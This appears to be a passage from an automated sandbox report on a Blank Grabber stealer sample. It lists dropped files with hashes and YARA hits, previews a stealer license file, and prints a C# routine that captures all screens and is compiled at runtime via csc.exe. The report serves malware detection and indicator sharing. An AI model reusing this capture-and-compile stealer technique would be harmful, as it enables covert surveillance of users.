                                                            SHA-512:A8A06A1303E76C76D1F06B689E163BA80C1A8137ADAC80FAB0D5C1C6072A69D506E0360D8B44315EF1D88CBD0C9AC95C94D001FAD5BC40727F1070734BBBBE63
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Process:C:\Users\user\Desktop\e45AiBoV6X.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1507312
                                                            Entropy (8bit):7.992414868541998
                                                            Encrypted:true
                                                            SSDEEP:24576:crd6K1Bo1WfBpYjgE47pPsk1mEbFz9S/s/owvzjN1Qf4xsb+hnj3NhpRodki1X:dK1OWfBpYjjopXtBzY/s/oohjsbenj3w
                                                            MD5:B93EDA8CC111A5BDE906505224B717C3
                                                            SHA1:5F1AE1AB1A3C4C023EA8138D4B09CBC1CD8E8F9E
                                                            SHA-256:EFA27CD726DBF3BF2448476A993DC0D5FFB0264032BF83A72295AB3FC5BCD983
                                                            SHA-512:B20195930967B4DC9F60C15D9CEAE4D577B00095F07BD93AA4F292B94A2E5601D605659E95D5168C1C2D85DC87A54D27775F8F20EBCACF56904E4AA30F1AFFBA
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Process:C:\Users\user\Desktop\e45AiBoV6X.exe
                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):630736
                                                            Entropy (8bit):6.409476333013752
                                                            Encrypted:false
                                                            SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                            MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                            SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                            SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                            SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Process:C:\Users\user\Desktop\e45AiBoV6X.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):456
                                                            Entropy (8bit):4.447296373872587
                                                            Encrypted:false
                                                            SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                            MD5:4531984CAD7DACF24C086830068C4ABE
                                                            SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                            SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                            SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rarreg.key, Author: Joe Security
                                                            Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                            Process:C:\Users\user\Desktop\e45AiBoV6X.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):23536
                                                            Entropy (8bit):7.33649667835335
                                                            Encrypted:false
                                                            SSDEEP:384:NiRf5SV1a/dSyQMZa7gJXUOjMIv7Gi64IYiSy1pCQaKEJ94i/8E9VFShf:NGxSVQFS0pEOgIv7GimYiSyvQJ9eEwf
                                                            MD5:3CDFDB7D3ADF9589910C3DFBE55065C9
                                                            SHA1:860EF30A8BC5F28AE9C81706A667F542D527D822
                                                            SHA-256:92906737EFF7FF33B9E2A72D2A86E4BD80A35018C8E40BB79433A8EA8ECE3932
                                                            SHA-512:1FE2C918E9CE524B855D7F38D4C69563F8B8C44291EEA1DC98F04E5EBDC39C8F2D658A716429051FB91FED0B912520929A0B980C4F5B4ECB3DE1C4EB83749A45
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Process:C:\Users\user\Desktop\e45AiBoV6X.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):627184
                                                            Entropy (8bit):7.993580071159261
                                                            Encrypted:true
                                                            SSDEEP:12288:RGzKl1BqBw166xh2tElkIExaDsI5HgIi0MRuQofTkFRjcdoPANBqwJceFBWpE:RsKl/Ew166OtHxaDJJwZATkrcB9JcgWa
                                                            MD5:59ED17799F42CC17D63A20341B93B6F6
                                                            SHA1:5F8B7D6202B597E72F8B49F4C33135E35AC76CD1
                                                            SHA-256:852B38BD2D05DD9F000E540D3F5E4962E64597EB864A68AA8BB28CE7008E91F1
                                                            SHA-512:3424AD59FD71C68E0AF716B7B94C4224B2ABFB11B7613F2E565F5D82F630E89C2798E732376A3A0E1266D8D58730B2F76C4E23EFE03C47A48CBF5F0FC165D333
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Process:C:\Users\user\Desktop\e45AiBoV6X.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):293360
                                                            Entropy (8bit):7.986777578304979
                                                            Encrypted:false
                                                            SSDEEP:6144:zxrLHdbWP4Ue5eV0KpvRWXH4mxy2Vc2X8r1kNgi7XG09JE1j4sbV9n:zNNWP4H543vRWomxdXgku8X9U1j4sbrn
                                                            MD5:2218B2730B625B1AEEE6A67095C101A4
                                                            SHA1:AA7F032B9C8B40E5ECF2A0F59FA5AE3F48EFF90A
                                                            SHA-256:5E9ADD4DD806C2DE4D694B9BB038A6716BADB7D5F912884D80D593592BCDB8CA
                                                            SHA-512:77AA10AE645C0BA24E31DCAB4726D8FB7AA3CB9708C7C85499E7D82CE46609D43E5DC74DA7CD32C170C7DDF50C8DB8945BAF3452421316C4A46888D745DE8DA0
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:MSVC .res
                                                            Category:dropped
                                                            Size (bytes):652
                                                            Entropy (8bit):3.1053319510196555
                                                            Encrypted:false
                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryW+Nak7Ynqqr+CPN5Dlq5J:+RI+ycuZhNZakSnPNnqX
                                                            MD5:30FC31EF00E66964297235642C432108
                                                            SHA1:4585CE280DE1C9134C813CB638C135B34A623C02
                                                            SHA-256:A14C4CDDF8E1982FB215D7415A94176D351F50FC1E04CF1F613435AF580C217D
                                                            SHA-512:EFD00ABE14640470901529E7E7116CEF834A9E5D7C5FA658378D4FDCBD82CA05A02194E896D60998EF4F4A08B25179C9F060FD2E18A4FE94D50093FE52F83DD8
                                                            Malicious:false
                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.o.h.k.a.n.2.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.o.h.k.a.n.2.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1004
                                                            Entropy (8bit):4.154581034278981
                                                            Encrypted:false
                                                            SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                            MD5:C76055A0388B713A1EABE16130684DC3
                                                            SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                            SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                            SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                            Malicious:false
                                                            Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):607
                                                            Entropy (8bit):5.385372746648231
                                                            Encrypted:false
                                                            SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfK2kWZEifK2h:V3ka6KOkqeFkOfbEiff
                                                            MD5:FFD41C26E0CE05043080AC778696A27B
                                                            SHA1:40A898742AA386E1A94DC9C786A57960A2617AB8
                                                            SHA-256:ED942CE0ADEB5ACBA5FCAD0482487D351FDB14986D450A7F2081004743CD75D7
                                                            SHA-512:50B73F7709949C4F262EBF91091D5116772C1F3665000A5BA4510F8559BF0B9AF9154F0FC65D49E41656D7F2B03DEF08752BFA52C416EBEA033F8DAA7989DCEF
                                                            Malicious:true
                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.0.cs"
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):4096
                                                            Entropy (8bit):3.159423636460403
                                                            Encrypted:false
                                                            SSDEEP:48:6H7oEAtf0KhzBU/ff6mtJDgN0MopW1ulZa31q:1Nz0KmEOMObK
                                                            MD5:1F8C0D8BC3AA839238477B4DE10F75B7
                                                            SHA1:F4A5EEF0E3563B7137525AABAE7382144D744B43
                                                            SHA-256:B6478A084879FE723B520FCDC77CCEB2942271E24B32D68C4D8118E675B95307
                                                            SHA-512:600AAAFA56A04A6032C1EC9AEC3234C8E83FB99A56C4A61202E1FF7BC18E959D6675F1D8A839868D9E4F09D8C4274E90D63F148679F78B2518BD7AB7424DE1BD
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k6.f...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                            Category:modified
                                                            Size (bytes):1148
                                                            Entropy (8bit):5.512406912468472
                                                            Encrypted:false
                                                            SSDEEP:24:KJfDId3ka6KOkqeFkOfbEifGKax5DqBVKVrdFAMBJTH:uDkka6NkqeFkybEuGK2DcVKdBJj
                                                            MD5:8EC65E50C60C4454F60AA853FE8976E6
                                                            SHA1:FD8042F2F254CE56BBEEADA907840F709DD82553
                                                            SHA-256:D8ABE0B617D56D0852C1903249944BC287300743C7E01254706C0F453DB69C95
                                                            SHA-512:8A26DDE31A90924D546C375173E0389695903F6D8C8D51361E49E5B12BCBD5717A308BD3DBD574030B287BAD710765C4146BE6527001D84D823B73DFBD48AF12
                                                            Malicious:false
